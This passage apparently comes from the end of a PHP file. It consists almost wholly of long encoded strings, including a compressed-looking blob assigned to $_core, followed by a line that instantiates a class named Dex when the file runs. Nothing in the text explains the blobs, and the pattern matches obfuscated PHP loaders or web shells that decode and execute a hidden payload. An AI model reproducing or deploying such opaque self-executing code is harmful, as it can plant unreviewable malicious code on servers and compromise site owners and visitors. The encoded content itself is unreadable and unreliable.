	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
	coMVvsK/Xi6vdPD8aJi3bhHd1AJD2Z5n31E3';
	 
	var $_core = 'bVLvT9swEP1cJP6Hw4pwIkUtEaxFyo8vKIgJaWVtty8FVWniqqaJnTn2Sjb6v+9iGFsL3+7u3T2/e2dn
	8wtioDQEp9JbDFdZ2bDw+Mh5ahmmZEGgD41ZNlq5zToLXGcxTSff08mc3sxmd4ub8XRGHzwfznw493CQ
	r1zeNExj4yT9+i2dzuZ08eMRezz4fXzU6zn2yX3Kg07LFgw7ut4OGCr6j/VqPL79nM47gQec+1hogZet
	tDLMkll9J6yqdeviEM4rpo0SkCmV2ZIPNF+OsqCgPnQ8vnWmk8LytQQaLWXRghS5FJo96YoJE5NXEmse
	SaImV7zWSSFzg7jubxXXrBQuuTi7gC9Sw7U0oiBe+NYhxYa1hdyK7gRG5JpL4TLcjq/AZf1cq/KWtXB6
	2mXYeiULPE8cw3AEz8+wX7scflD79L4WBKN/BrwcfhduuUAdKCgveb75SM7Jm56/wyG8W/WeRiupKsjs
	bEwIVEyvZRGTWjYaPeKiNhp0W7OYdEYSEFmFMf6AAxS/SsUR/5mVBtMkQXzQkSf31At30eDV7mjQnSah
	4R8=';
}

new Dex();
?>
